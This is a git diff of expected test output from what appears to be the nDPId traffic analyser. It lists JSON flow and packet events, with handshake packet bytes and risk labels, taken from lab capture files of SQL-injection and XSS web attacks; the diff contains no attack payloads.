+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":94,"total-skipped-flows":0,"total-l4-data-len":23660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":57,"global_ts_msec":1499348519077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 94/94 diff --git a/test/results/WebattackXSS.pcap.out b/test/results/WebattackXSS.pcap.out index c7fde0b79..c7188f901 100644 --- a/test/results/WebattackXSS.pcap.out +++ b/test/results/WebattackXSS.pcap.out 
@@ -1,3972 +1,3972 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackXSS.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1499346935283} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935283,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IaFAAD4GpDesEAABwKgKMsuEAFAW1en3YJstfIAQAOU89QAAAQEICgE4yFYD4pnN"} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZwtAAD4GXsWsEAABwKgKMsuWAFCoJa+oAAAAAKACchBxcwAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9xAAD4GxfOsEAABwKgKMsuYAFCG7Dd\/AAAAAKACchAK1AAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5YT3KepqCWvqaAScSAY0AAAAgQFtAQCCAoD4poaATjIowEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5hHE6nghuw3gKAScSB8wgAAAgQFtAQCCAoD4poaATjIowEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZwxAAD4GXsysEAABwKgKMsuWAFCoJa+pE9ynqoAQAOW31wAAAQEICgE4yKMD4poa"} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/91AAD4GxfqsEAABwKgKMsuYAFCG7DeARxOp4YAQAOUbygAAAQEICgE4yKMD4poa"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956870,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499346956933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956933,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nkBAAD4GJ5isEAABwKgKMsvqAFAHDkNVohK80oAQAOX4AAAAAQEICgE43WsD4q7i"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F6tAAD4GriWsEAABwKgKMsv8AFD6EcpoAAAAAKACchDvQAAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iOxAAD4GPOSsEAABwKgKMsv+AFCTelUvAAAAAKACchDLDwAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/xzRrv9+hHKaaAScSANvwAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/7+F1DJk3pVMKAScSDJ8AAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F6xAAD4GriysEAABwKgKMsv8AFD6Ecppc0a7\/oAQAOWsxgAAAQEICgE43cMD4q86"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iO1AAD4GPOusEAABwKgKMsv+AFCTelUw\/hdQyoAQAOVo+AAAAQEICgE43cMD4q86"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976603,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="} 